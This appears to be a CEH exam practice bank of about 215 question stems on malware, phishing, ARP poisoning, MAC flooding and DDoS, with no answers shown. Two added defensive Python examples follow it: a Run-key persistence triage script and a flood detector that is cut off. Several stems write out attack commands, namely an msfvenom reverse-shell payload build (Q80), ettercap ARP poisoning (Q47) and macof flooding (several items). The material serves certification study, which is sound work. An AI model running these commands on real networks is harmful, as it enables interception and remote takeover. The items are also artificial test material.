Practice CEH Malware, Social Engineering and Network Attacks questions with full explanations on every answer.
1. A security analyst notices a high volume of ICMP Echo Reply packets on the network. The source IPs are varied, but the destination IP is the same. Which type of attack is MOST likely occurring?
2. A user receives a phone call from someone claiming to be from IT support, asking for their password to troubleshoot an issue. Which social engineering technique is being used?
3. Which tool would a penetration tester MOST likely use to perform ARP poisoning and conduct a man-in-the-middle attack on a local network?
4. An analyst observes the following output from Wireshark: a TCP packet with the SYN flag set, followed by a SYN-ACK, then an ACK, and then a RST. The sequence numbers show the expected pattern: the SYN carries seq=100, and the SYN-ACK carries seq=300, ack=101. What is the MOST likely interpretation?
5. A security team discovers a file named 'svchost.exe' in a user's Temp folder. The file is signed by 'Microsoft Corporation' but the digital signature validation fails. Which analysis method should be used FIRST to determine if it's malicious?
6. An organization is experiencing repeated DDoS attacks that consume all available bandwidth. Which mitigation technique is MOST effective for handling such volumetric attacks?
7. Which type of malware is characterized by self-replication and spreading across networks without needing a host file?
8. A penetration tester uses the Social Engineering Toolkit (SET) to create a malicious USB drive that autoruns when inserted. Which social engineering technique is being employed?
9. An IDS alerts on a large number of outbound DNS queries from an internal host to a suspicious domain. The queries have random subdomains and the response size is large. Which attack is MOST likely in progress?
10. Which type of malware encrypts the victim's files and demands payment for the decryption key?
11. A network administrator notices that the switch's CAM table is full, causing the switch to flood all incoming traffic out of all ports. Which attack is MOST likely occurring?
12. During a penetration test, you capture the following output: 'HTTP/1.1 200 OK ... Set-Cookie: sessionid=abc123; path=/'. You then send a request with a modified cookie value 'sessionid=abc124' and receive a valid session. Which type of vulnerability has been exploited?
13. Which TWO of the following are characteristics of a polymorphic virus? (Select 2)
14. Which THREE of the following are effective DDoS mitigation techniques? (Select 3)
15. Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)
16. A security analyst receives an alert indicating that a host on the internal network is sending a high volume of ICMP echo requests to multiple external IP addresses. The analyst notices that the source IP address is spoofed. Which type of attack is MOST likely occurring?
17. Which of the following tools is specifically designed for ARP poisoning and can be used to perform man-in-the-middle attacks on a local network?
18. A system administrator notices unusual outbound traffic from a server on port 4444. The server has no legitimate service listening on that port. A malware analyst runs 'strings' on a suspicious binary and finds a reference to 'cmd.exe /c' and an IP address. What type of malware is MOST likely present?
19. An organization wants to test its employees' susceptibility to social engineering by sending fake emails that appear to come from the IT department, requesting password resets. Which tool would be MOST effective for conducting this test?
20. A security team observes that a switch's MAC address table is full, and the switch has started flooding unicast traffic to all ports. Which attack has MOST likely been performed?
21. Which type of malware spreads by replicating itself across a network without requiring a host file to attach to?
22. An analyst uses the following command to capture traffic: tcpdump -i eth0 -w capture.pcap host 10.0.0.5 and port 80. After generating traffic from a web server at 10.0.0.5, the analyst examines the pcap with Wireshark. What type of traffic will appear in the capture?
23. A security analyst detects a file named 'invoice.pdf.exe' in an email attachment. When the file is submitted to VirusTotal, multiple engines detect it as a Trojan. The analyst wants to perform dynamic analysis to observe its behavior. Which approach is BEST?
24. Which type of social engineering attack involves a malicious actor impersonating a legitimate organization in a voicemail message to trick the victim into revealing sensitive information?
25. A penetration tester is performing a session hijacking attack. After capturing packets, the tester successfully predicts the TCP sequence numbers and injects packets to take over the session. Which type of attack is this?
26. A security engineer is configuring DDoS protection for a web server. The goal is to mitigate a Slowloris attack. Which mitigation technique is MOST effective?
27. An employee receives an email that appears to be from the CEO, requesting an urgent wire transfer. The email address is slightly misspelled (e.g., ceo@cornpany.com instead of ceo@company.com). This is an example of which type of attack?
28. Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)
29. Which THREE of the following are techniques used in static malware analysis? (Select 3)
30. Which TWO of the following are common indicators of a DNS spoofing attack? (Select 2)
31. A security analyst discovers a user downloaded a file that, when executed, creates a hidden process that connects to a remote server and allows full remote control of the system. Which type of malware BEST describes this behavior?
32. A penetration tester receives an email that appears to be from the company's CEO, urgently requesting that the tester click a link to review a document. The email contains several grammatical errors and the sender's address is slightly misspelled. Which type of social engineering attack is this MOST likely?
33. An organization's security team observes a surge in outgoing DNS queries to external servers from a single internal host, with each query returning unusually large responses (e.g., 4000 bytes). The host is not configured as a DNS resolver. Which attack is MOST likely occurring?
34. A security analyst is investigating a suspicious file and wants to quickly determine whether it is known malware without executing it. Which approach should the analyst use FIRST?
35. A network administrator notices that the ARP cache on several workstations contains entries mapping the default gateway IP to an unknown MAC address. Users report intermittent connectivity issues. Which tool is MOST likely being used to perform this attack?
36. Which of the following malware types is characterized by self-replication without requiring a host file or program, and spreading across networks automatically?
37. During a penetration test, you execute a command that sends a large number of spoofed ICMP echo request packets to a subnet's broadcast address. This results in a flood of replies to the target system. Which attack have you performed?
38. A security analyst notices that a web server is experiencing slow response times, and the connection logs show many incomplete HTTP requests from various IP addresses, each keeping connections open for long periods. Which attack is MOST likely occurring?
39. A company's security team wants to deploy a DDoS mitigation technique that distributes incoming traffic across multiple servers in different geographic locations, making it harder for an attacker to overwhelm a single target. Which technique BEST fits this description?
40. Which of the following is a tool commonly used for MAC flooding attacks to force a switch into fail-open mode, allowing sniffing of all traffic on the network?
41. A penetration tester uses the following command to scan a target: nmap -sU -sV -p 53,161,162 10.0.0.1. Which of the following BEST describes what this scan will accomplish?
42. An attacker calls a company's help desk, pretending to be a new employee who forgot his username and password. The attacker provides some employee details gleaned from social media and convinces the help desk to reset the password. Which social engineering technique is being used?
43. Which TWO types of malware typically require user interaction (e.g., opening a file or clicking a link) to activate? (Select two.)
44. Which THREE of the following are characteristics of a DNS amplification DDoS attack? (Select three.)
45. Which TWO of the following are examples of static malware analysis techniques? (Select two.)
46. A security analyst notices repeated failed login attempts from a single external IP address targeting the company's webmail portal. The attempts use common usernames like 'admin', 'user', and 'test'. Which type of attack is MOST likely being attempted?
47. During a penetration test, a security analyst runs the following command on a Linux system: ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//. What is the PRIMARY purpose of this command?
48. An incident response team discovers a suspicious executable on a compromised workstation. They want to analyze the malware without executing it. Which of the following techniques would be MOST appropriate for this initial analysis?
49. A security analyst observes a sudden surge in incoming UDP traffic to the company's DNS servers from multiple external IP addresses. The packets appear to be DNS queries with spoofed source IPs. Which type of DDoS attack is MOST likely occurring?
50. Which of the following is a type of malware that spreads by replicating itself across a network without requiring a host file?
51. A penetration tester uses a tool to perform ARP poisoning and then launches a man-in-the-middle attack. The tool also allows session hijacking and sniffing. Which of the following tools is being used?
52. An employee receives an email that appears to be from the company's CEO, requesting an urgent wire transfer to a vendor. The email address is slightly different from the CEO's actual address. Which type of social engineering attack is this?
53. A security analyst is analyzing a suspicious file and runs the command 'strings malware.exe | grep -i http'. The output shows several URLs ending with '.exe'. What does this indicate?
54. Which of the following tools is specifically designed to perform MAC flooding to force a switch into fail-open mode, allowing packet sniffing?
55. A user reports that their computer is infected with ransomware. Which of the following is the BEST immediate action for the security team to take?
56. Which type of malware is characterized by modifying its own code to evade signature-based detection, often changing its appearance each time it replicates?
57. A network administrator notices an unusual amount of traffic on port 389 from an internal server to multiple external IP addresses. Which type of malware might be present?
58. Which TWO of the following are characteristics of a DNS amplification attack? (Select 2)
59. Which THREE of the following are examples of application-layer DDoS attacks? (Select 3)
60. Which TWO of the following are valid techniques for session hijacking? (Select 2)
61. A security analyst discovers a file named invoice.exe in an email attachment. Static analysis with PEiD indicates the file is packed with UPX. What is the BEST next step in analyzing this malware?
62. A network administrator notices an unusually high number of half-open TCP connections to the company's web server. The source IPs are spoofed. Which type of attack is MOST likely occurring?
63. During a penetration test, an analyst uses a tool that sends forged ARP replies to associate the attacker's MAC address with the IP address of the default gateway. This technique allows the attacker to intercept traffic. Which tool is commonly used for this purpose?
64. A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets to a broadcast address. Which type of attack is this indicative of?
65. A user receives a phone call from someone claiming to be from IT support, asking for their password to perform a system update. This is an example of which social engineering technique?
66. A forensic analyst examines a system infected with malware that displays ransomware notes and encrypts files. The analyst uses a sandbox to observe behavior. During analysis, the malware contacts a C2 server and downloads additional payloads. Which type of malware analysis is being performed?
67. Which type of malware is designed to replicate itself across networks without requiring a host file, often exploiting vulnerabilities to spread?
68. An organization wants to protect against DNS spoofing attacks. Which security measure is MOST effective in preventing an attacker from poisoning DNS cache entries?
69. A security team suspects a session hijacking attack. The analyst examines network traffic and sees packets with sequence numbers that increment by predictable values. Which attack is MOST likely occurring?
70. Which tool is specifically designed to create and manage phishing campaigns for security awareness testing?
71. A network switch starts behaving like a hub, broadcasting all traffic to all ports. The security team suspects an attack that floods the switch with fake MAC addresses. Which attack is this?
72. Which DoS attack exploits the HTTP protocol by sending partial HTTP requests to keep connections open, exhausting server resources?
73. Which TWO of the following are characteristics of a polymorphic virus? (Select 2)
74. Which THREE of the following are effective DDoS mitigation techniques? (Select 3)
75. Which TWO of the following are types of malware analysis? (Select 2)
76. A security analyst observes repeated failed login attempts from a single IP address targeting multiple user accounts. Which type of attack is being attempted?
77. A security analyst runs the command 'tcpdump -i eth0 -n host 10.0.0.5 and port 80' and sees many packets with the SYN flag set but no corresponding ACK. Which attack is likely occurring?
78. During a penetration test, you discover a process named 'svch0st.exe' running on a Windows server with high CPU usage. The file is not digitally signed. Which type of malware is MOST likely present?
79. An attacker sends an email that appears to come from the CEO, requesting that the recipient urgently transfer funds to a specified account. Which type of social engineering attack is this?
80. A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe' and transfers the file to a target. Which technique is being used?
81. After a security incident, an analyst retrieves a suspicious file. The analyst runs the 'strings' command on it and sees references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique does this indicate?
82. An organization experiences a DDoS attack where a large volume of DNS queries with spoofed source IPs are sent to open DNS resolvers, which then amplify the traffic to the victim. Which type of attack is this?
83. During a penetration test, you run the command: 'macof -i eth0 -s 192.168.1.1 -d 192.168.2.1 -e 00:11:22:33:44:55'. What is the intended effect of this command?
84. An analyst is analyzing a suspicious file using VirusTotal and observes that only 3 out of 60 antivirus engines detect it as malicious. The file has been submitted before but with no detections. What should the analyst conclude?
85. A security analyst notices that the ARP cache on a workstation contains multiple entries for the same IP address with different MAC addresses. Which attack is likely occurring?
86. An attacker wants to perform a man-in-the-middle attack on a local network. Which of the following tools would be most effective? A) Wireshark B) Ettercap C) Nmap D) Metasploit E) Aircrack-ng
87. Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?
88. Which TWO of the following are effective mitigation techniques against DDoS attacks? (Select two)
89. Which THREE of the following are indicators that a system may be infected with a backdoor Trojan? (Select three)
90. Which TWO of the following are examples of social engineering attacks? (Select two)
91. A security analyst notices an unusual spike in outbound traffic on UDP port 53 from a single internal host. The host is not a DNS server. Which type of malware is MOST likely responsible?
92. Which tool would an ethical hacker use to automatically generate a malicious USB drive that, when plugged in, executes a payload and connects back to the attacker?
93. During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corresponding ARP requests. An internal host's IP address is suddenly associated with two different MAC addresses. Which attack is MOST likely occurring?
94. A penetration tester wants to perform a stealth scan without completing the TCP three-way handshake. The target is a web server on port 80. The tester uses Nmap with the -sS flag. What is the expected behavior if the port is open?
95. Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?
96. A security analyst reviews logs and notices that an attacker crafted a packet with a source IP address matching the target's IP address, and sent it to a network's broadcast address. Which type of attack does this describe?
97. Which of the following is a characteristic of a polymorphic virus?
98. An organization experiences a DDoS attack where the attacker sends many incomplete HTTP requests that keep connections open, exhausting the server's connection pool. Which attack technique is being used?
99. During a social engineering engagement, an attacker calls an employee pretending to be from IT support and asks for their password to perform a system update. Which social engineering technique is being employed?
100. Which type of malware is characterized by its ability to spread without requiring a host file and can replicate across networks automatically?
101. A company wants to defend against DNS amplification attacks. Which mitigation technique would be MOST effective?
102. An ethical hacker is analyzing a suspicious file using static analysis. Which of the following actions is part of static malware analysis?
103. Which TWO of the following are examples of application-layer DDoS attacks? (Choose two.)
104. Which THREE of the following are common indicators of a man-in-the-middle attack using ARP spoofing? (Choose three.)
105. Which TWO of the following are techniques used in session hijacking attacks? (Choose two.)
106. A security analyst observes a gradual increase in network traffic from an internal host to an external IP address on port 443, with the host also connecting to a known command-and-control (C2) domain. Which type of malware is MOST likely responsible?
107. Which of the following tools is commonly used for dynamic malware analysis by executing the malware in an isolated environment and monitoring system changes?
108. An organization receives an email that appears to be from the CEO, urgently requesting that the recipient wire funds to a new vendor. The email contains the CEO's name and title but the sender address is slightly misspelled. Which type of social engineering attack is this?
109. A security analyst detects an ongoing DDoS attack where the attacker sends a large number of ICMP echo request packets with spoofed source IP addresses to a network's broadcast address. The attack overwhelms the target with responses from all hosts on the network. Which attack type is this?
110. Which tool can be used to perform ARP poisoning to intercept traffic between a victim and the default gateway?
111. A user reports that their system has become very slow and numerous pop-up ads appear even when browsing is not active. Which type of malware is MOST likely installed?
112. An analyst captures network traffic and sees a large number of packets with source IP 10.0.0.1, destination IP 192.168.1.1, TCP SYN flag set, with sequence numbers that appear incremental. The destination responds with SYN-ACK but the source never completes the handshake. Which attack is MOST likely occurring?
113. Which of the following is a form of social engineering where an attacker physically follows an authorized person into a restricted area without proper authentication?
114. An attacker uses the Social Engineering Toolkit (SET) to clone a legitimate website and send a malicious link to employees. When an employee clicks the link, they are prompted to enter their credentials. Which attack is this?
115. A penetration tester runs the following command: `macof -i eth0 -s 192.168.1.100 -d 10.0.0.1`. Which attack is being performed?
116. Which type of malware is characterized by being able to change its code signature each time it replicates to evade signature-based detection?
117. An organization wants to mitigate the impact of a DDoS attack by distributing incoming traffic across multiple servers in different geographic locations. Which technique is BEST suited?
118. Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)
119. Which THREE of the following are static malware analysis techniques? (Select 3)
120. Which TWO of the following are examples of session hijacking attacks? (Select 2)
121. A security analyst receives an email that appears to be from the CEO, urgently requesting a wire transfer. The email address is slightly misspelled (ceo@cornpany.com instead of ceo@company.com). Which type of social engineering attack is this?
122. During a penetration test, a tester uses a tool to perform ARP spoofing to intercept traffic between two hosts on the same subnet. Which tool is most commonly associated with this technique?
123. A security analyst runs the following command: 'macof -i eth0 -n 1000'. Shortly after, the switch begins flooding traffic to all ports. What is the analyst trying to achieve?
124. A user reports that their system has become sluggish and they see pop-up advertisements even when no browser is open. Additionally, unknown processes are running in Task Manager. Which type of malware is most likely responsible?
125. A security team detects a large number of UDP packets from multiple sources directed at a single server's DNS port (53). The packets appear to have a spoofed source IP of the target. Which type of DDoS attack is being observed?
126. After a security incident, an analyst retrieves a suspicious file. To determine if it is malicious without executing it, the analyst runs the 'strings' command and uploads the file to VirusTotal. Which type of malware analysis is being performed?
127. A penetration tester successfully predicts the TCP sequence numbers of a target and sends crafted packets to impersonate a trusted host. Which type of attack is this?
128. Which of the following is a type of malware that replicates itself by attaching to executable files and requires human action to spread, such as opening an infected attachment?
129. A security analyst notices that a web server is responding very slowly to legitimate requests. The server logs show many incomplete HTTP GET requests that never complete, each opened slowly over time from many different IP addresses. Which attack is most likely occurring?
130. An attacker gains physical access to a building by following an authorized employee through a secure door without using a badge. Which social engineering technique is being used?
131. Which tool is commonly used to perform DNS spoofing on a local network by intercepting DNS requests and replying with forged responses?
132. A system administrator receives a phone call from someone claiming to be from IT support, asking for the administrator's password to 'fix a server issue'. This is an example of which social engineering attack?
133. Which TWO of the following are characteristics of a polymorphic virus?
134. Which THREE of the following are effective DDoS mitigation techniques?
135. Which TWO of the following are examples of application-layer DDoS attacks?
136. A security analyst notices that an internal server is sending a high volume of DNS queries to external servers for non-existent domains. Which type of malware behavior is MOST likely being observed?
137. During a social engineering assessment, an attacker calls a help desk impersonating a new employee and requests a password reset due to a 'locked account'. The help desk complies. Which social engineering technique is being used?
138. A security analyst runs 'strings malware.exe' and finds several URLs and IP addresses. The analyst then uploads the file to VirusTotal and gets a detection ratio of 5/70. What type of analysis has been performed?
139. An analyst observes that a web server is receiving many HTTP GET requests with random parameter values, each request taking a long time to complete. The server's connection pool is exhausted, and legitimate users cannot access the site. Which attack is MOST likely occurring?
140. Which tool is specifically designed to automate social engineering attacks, such as phishing and credential harvesting?
141. A network administrator receives an alert that the switch's CAM table is full, causing the switch to flood frames out all ports. Which attack has likely occurred?
142. A security analyst captures network traffic and sees a sequence of ARP replies with the same IP address mapping to different MAC addresses within a short period. Which attack is indicated?
143. An attacker sends an email to the CEO of a company, pretending to be a board member and requesting a wire transfer for a confidential acquisition. Which social engineering attack is this?
144. A security analyst uses a tool to capture packets in promiscuous mode on a network segment. The analyst notices that only traffic to and from the analyst's machine is captured, not all traffic on the segment. What is the most likely reason?
145. Which of the following is the BEST defense against a TCP SYN flood attack?
146. A penetration tester uses a tool to spoof ARP replies, redirecting traffic through the tester's machine. The tester then captures credentials from the redirected traffic. Which tool is BEST suited for this task?
147. An employee receives an SMS message that claims to be from the IT department, asking the employee to click a link to verify their email account. Which social engineering attack is this?
148. Which TWO of the following are characteristics of a polymorphic virus? (Choose two.)
149. Which TWO of the following are examples of protocol-based DoS attacks? (Choose two.)
150. Which THREE of the following are effective techniques to prevent ARP poisoning attacks? (Choose three.)
151. A security analyst notices a significant increase in outbound traffic from an internal server to multiple external IPs on port 443. The server is not a web server and should not be initiating such connections. Which type of malware is MOST likely causing this behavior?
152. Which tool is commonly used for ARP spoofing attacks to perform man-in-the-middle (MITM) attacks on a local network?
153. An attacker uses the Social Engineering Toolkit (SET) to craft a phishing email that appears to come from the company's CEO, requesting the recipient to urgently wire funds to a new vendor. This attack is BEST described as which type of social engineering?
154. During a penetration test, a tester captures network traffic and notices a large number of ARP replies claiming that 192.168.1.1 is at MAC address 00:11:22:33:44:55, which is different from the legitimate gateway MAC. Which attack is likely in progress?
155. A security administrator notices that the network switch is broadcasting traffic to all ports as if it were a hub. The switch logs show a sudden flood of packets with random MAC addresses. Which attack is MOST likely occurring?
156. A malware analyst wants to examine a suspicious executable without executing it. The goal is to extract strings, view the PE header, and check for known signatures. Which approach is the analyst using?
157. An organization experiences a DDoS attack where the attacker sends a flood of UDP packets to a server, causing it to become unresponsive. The packets appear to come from many different source IP addresses and are directed to random high-numbered ports. Which type of DDoS attack is this?
158. A SOC analyst observes a high number of incomplete TCP connections with the SYN flag set but no corresponding ACK from the target. The source IPs are spoofed and the connections are targeting port 80 on a web server. Which DDoS mitigation technique would be MOST effective in this scenario?
159. Which type of malware is characterized by encrypting a victim's files and demanding a ransom payment for the decryption key?
160. A penetration tester uses a tool to perform a man-in-the-middle attack by sending forged DNS responses that redirect users to a malicious website. Which tool is MOST likely being used to perform DNS spoofing?
161. During a forensic investigation, an analyst finds a suspicious file that changes its code signature each time it replicates. The file uses encryption and polymorphism to evade signature-based detection. Which type of virus is this?
162. An employee receives a text message claiming to be from the company's IT department, stating that their account will be suspended unless they click a link to verify their credentials. Which type of social engineering attack is this?
163. Which TWO of the following are characteristics of a SYN flood attack? (Select 2)
164. Which THREE of the following are common methods used to mitigate DDoS attacks? (Select 3)
165. Which TWO of the following are examples of application layer (Layer 7) DDoS attacks? (Select 2)
166. A security analyst receives an email from what appears to be the company's CEO requesting an urgent wire transfer. The email address is slightly misspelled (e.g., ce0@company.com instead of ceo@company.com). Which type of social engineering attack is this?
167. A security analyst notices that a server is sending an unusually high number of SYN packets to multiple external hosts, but the connections are never completed. The server is most likely involved in which type of attack?
168. A penetration tester needs to perform ARP poisoning to intercept traffic between two hosts on the same subnet. Which tool would be the most appropriate choice for this task?
169. During a ransomware incident response, a forensic analyst recovers a suspicious file that appears to be a PE executable. The analyst wants to quickly check if the file is known malware without executing it. Which of the following is the BEST first step?
170. Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?
171. A security team wants to mitigate a DNS amplification DDoS attack. Which of the following techniques would be MOST effective in preventing the attack from leveraging open DNS resolvers?
172. During a penetration test, an attacker gains access to a system and wants to maintain persistent remote control. Which type of Trojan is specifically designed for this purpose?
173. A security analyst observes the following in a packet capture: a single source IP sends a large number of ICMP echo request packets to the broadcast address of a subnet, with the source IP spoofed to be the target victim. Which type of attack is being executed?
174. Which of the following is a characteristic of a polymorphic virus?
175. An attacker uses the Social Engineering Toolkit (SET) to send a malicious email to employees of a company, claiming to be from IT support and urging them to click a link to reset their password. Which social engineering attack is being performed?
176. An analyst runs the following command: `tcpdump -i eth0 -w http_traffic.pcap src host 192.168.1.10 and dst port 80`. What is the primary purpose of this command?
177. A company wants to protect its network from MAC flooding attacks. Which of the following countermeasures is MOST effective?
178. Which TWO of the following are examples of application layer DDoS attacks? (Select two.)
179. Which THREE of the following are techniques used in session hijacking? (Select three.)
180. Which TWO of the following are types of malware analysis? (Select two.)
181. A security analyst observes a sudden flood of ICMP echo request packets from multiple external IPs to a single internal server. The packets have varying sizes and spoofed source addresses. Which type of attack is MOST likely occurring?
182. Which tool is specifically designed to create fake login pages for phishing campaigns and can be integrated with Metasploit?
183. During a forensic investigation, an analyst retrieves a suspicious executable. Running 'strings' reveals no readable text, and VirusTotal shows zero detections. However, when executed in a sandbox, the binary connects to a remote IP and injects code into 'explorer.exe'. Which conclusion is MOST accurate?
184. A security analyst notices that users receive emails from a known vendor requesting urgent payment to a new bank account. The email domain is misspelled (e.g., vvendorfake.com). Which type of social engineering is this?
185. Which malware type is characterized by self-replication across networks without needing a host file?
186. An attacker gains physical access to a restricted area by following an authorized employee through a secured door without swiping a badge. This technique is known as:
187. A security team detects that an internal host is sending ARP replies claiming to have the IP address of the default gateway. Which tool is MOST likely being used to perform this attack?
188. Which DDoS attack type exploits a small query to a vulnerable service that generates a large response directed at the victim?
189A user receives a text message claiming their bank account is locked and requiring them to click a link to verify. This social engineering method is called:
190Which malware analysis approach involves running the suspicious file in a controlled environment to observe its behavior?
191A penetration tester uses a tool to perform a MAC flooding attack. What is the intended result of this attack?
192Which tool would an analyst use to capture packets from a network interface and later analyze the pcap file for signs of an attack?
193Which TWO of the following are characteristics of a polymorphic virus? (Choose 2)
194Which THREE of the following are effective DDoS mitigation techniques? (Choose 3)
195Which TWO of the following are techniques used in session hijacking? (Choose 2)
196A security analyst notices repeated TCP SYN packets sent to a server without corresponding SYN-ACK replies. The source IP addresses are spoofed and appear to be random. Which type of attack is MOST likely occurring?
197A user receives an email claiming to be from their bank, asking them to click a link and verify their account credentials. The email contains spelling errors and the link points to a suspicious domain. What type of social engineering attack is this?
198During a penetration test, a tester discovers that the target switch's MAC address table is full, causing it to flood traffic out all ports. The tester then captures network traffic using Wireshark on the same segment. Which attack was the tester performing?
199An organization wants to mitigate the impact of a DDoS attack that uses large volumes of UDP traffic to exhaust bandwidth. Which of the following techniques would be MOST effective?
200A security analyst receives an alert indicating that a workstation is sending outbound connections to a known malicious IP address. The analyst suspects a Trojan. Which tool is BEST for performing dynamic analysis of the suspicious binary?
201An attacker intercepts a TCP session between a client and a server. By analyzing sequence numbers, the attacker successfully predicts the next sequence number and injects malicious packets. Which attack is being performed?
202Which TWO of the following are characteristics of a polymorphic virus?
203Which TWO tools are commonly used for ARP poisoning attacks?
204Which THREE of the following are indicators of a slowloris DDoS attack?
205Which TWO of the following are types of malware that specifically aim to demand payment from victims?
206Which TWO of the following are examples of amplification attacks used in DDoS?
207Which THREE of the following are techniques used in session hijacking?
208Which TWO of the following are types of social engineering attacks that rely on impersonation?
209Which THREE of the following are valid methods for DDoS mitigation?
210Which TWO of the following are features of a Remote Access Trojan (RAT)?
211A security analyst reviews a sandbox report for a suspicious executable. The report shows that the executable modified the Windows registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add a new entry pointing to itself. This action is characteristic of which type of malware?
212During a penetration test, you run the tool 'macof' against a switch. After a few seconds, the switch starts flooding frames out all ports. Which attack have you successfully executed, and what is the primary goal of this technique?
213An attacker sends an email that appears to come from the CEO of the company, requesting an urgent wire transfer to a specific account. This is an example of which social engineering attack?
214A network administrator notices unusual traffic patterns: the internal DNS server is receiving large DNS queries with the source IP spoofed to appear as the internal DNS server itself. The queries appear to be amplification requests. Which TWO characteristics describe this attack?
215During a forensic investigation, you find a file named 'svch0st.exe' in the startup folder. The file has a suspicious icon and was downloaded from an untrusted source. Analysis shows it opens a backdoor on port 4444 and sends system information to a remote server. Which THREE best describe this malware and its characteristics?
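Questions 211 and 215 both turn on the same persistence pattern: an autostart entry under a CurrentVersion\Run key that points at an executable living in a user-writable location, often under a name that imitates a Windows system binary (svch0st.exe for svchost.exe). The following is an added example of how an analyst turns those two indicators into a triage script for a .reg export of the Run keys. It is not code from the Courseiva question bank; the registry export, user name, and the list of imitated system binaries are constructed for the demonstration.

```python
"""Triage of Windows Run-key autostart entries from a .reg export (added example).
Scores each value on two indicators: the executable sits outside a trusted system
directory (Temp, AppData, ProgramData) and its name imitates a Windows system binary.
The SAMPLE_REG text below is constructed for the demo, not a real export."""
import re
from dataclasses import dataclass

TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE_MARKERS = ("\\temp\\", "\\appdata\\", "\\programdata\\", "\\downloads\\", "\\startup\\")
# Names attackers commonly imitate; an exact match outside C:\Windows is suspicious as well.
SYSTEM_BINARIES = ("svchost", "lsass", "csrss", "smss", "winlogon", "services", "explorer", "dllhost", "rundll32")
LEET = str.maketrans("0135", "oles")  # undo digit-for-letter substitutions before comparing

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"Updater"="C:\\Users\\alice\\AppData\\Local\\Temp\\svch0st.exe -h"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Sys"="C:\\ProgramData\\lsasss.exe"
"""


@dataclass
class Finding:
    key: str
    name: str
    path: str
    indicators: tuple


def unescape_reg(value: str) -> str:
    # .reg strings escape backslash and quote with a backslash; drop the escaping backslash.
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            out.append(value[i + 1])
            i += 2
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def executable_path(command: str) -> str:
    """Pull the program path out of a Run value and normalise it for matching."""
    command = re.sub(r"%(windir|systemroot)%", lambda m: "C:\\Windows", command, flags=re.I)
    if command.startswith('"'):
        path = command[1:].split('"', 1)[0]
    else:
        m = re.match(r"(.+?\.exe)(\s|$)", command, re.I)
        path = m.group(1) if m else command.split()[0]
    return path.lower()


def edit_distance(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def indicators(path: str) -> tuple:
    found = []
    if not path.startswith(TRUSTED_PREFIXES):
        found.append("outside_trusted_dirs")
    if any(marker in path for marker in USER_WRITABLE_MARKERS):
        found.append("user_writable_dir")
    stem = path.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
    if stem in SYSTEM_BINARIES:
        if not path.startswith("c:\\windows\\"):
            found.append(f"system_name_outside_windows:{stem}")
    else:
        for known in SYSTEM_BINARIES:  # homoglyph (svch0st) or one-character (lsasss) imitation
            if stem.translate(LEET) == known or edit_distance(stem, known) == 1:
                found.append(f"lookalike_of_{known}")
                break
    return tuple(found)


def parse_run_entries(reg_text: str):
    key = None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and key.lower().endswith(("\\run", "\\runonce")):
            m = re.match(r'"([^"]+)"="(.*)"$', line)
            if m:
                yield key, m.group(1), unescape_reg(m.group(2))


def triage(reg_text: str):
    """Return Run entries, most indicators first, so the analyst reviews the worst ones first."""
    findings = []
    for key, name, cmd in parse_run_entries(reg_text):
        path = executable_path(cmd)
        findings.append(Finding(key, name, path, indicators(path)))
    return sorted(findings, key=lambda f: -len(f.indicators))


if __name__ == "__main__":
    for f in triage(SAMPLE_REG):
        print(f"{len(f.indicators)} {f.name:15} {f.path}  {', '.join(f.indicators) or 'no indicators'}")
```

The output ranks the Temp-resident svch0st.exe and the ProgramData lsasss.exe above OneDrive, which is flagged only for its AppData location; the heuristics produce review candidates, not verdicts, and signature checks or a sandbox run (as in 190 and 211) decide the rest.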
216. A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web server with multiple HTTP GET requests to the same page (/index.php?page=home). The requests appear legitimate but are coming at a very high rate. Which TWO types of attack is the analyst most likely witnessing?
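Several questions in this block describe the same kind of evidence from different angles: echo requests to a broadcast address with a forged source (173), an ICMP echo flood from many spoofed sources (181), a SYN flood whose handshakes never complete (196), and an HTTP GET flood against a single URL (216). The following is an added example of how those textual indicators become detection logic over decoded packet records. It is not code from the Courseiva question bank; the packet records, addresses, and thresholds are constructed for the demonstration and stand in for the summary fields a pcap parser would produce.

```python
"""Heuristic triage of decoded packet records for four flood patterns (added example).
The records, hosts and thresholds below are constructed for the demo, not captured traffic."""
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    ts: float
    proto: str            # "tcp" or "icmp"
    src: str
    dst: str
    dport: int = 0
    flags: str = ""       # TCP flags as letters: "S", "SA", "A", "PA"
    icmp_type: int = -1   # 8 = echo request, 0 = echo reply
    payload: str = ""     # request line of an HTTP request, if any


@dataclass
class Alert:
    kind: str
    target: str
    detail: str


def looks_broadcast(ip: str) -> bool:
    # Demo assumption: /24 subnets. Real tooling should use the site's actual masks.
    return ip == "255.255.255.255" or ip.endswith(".255")


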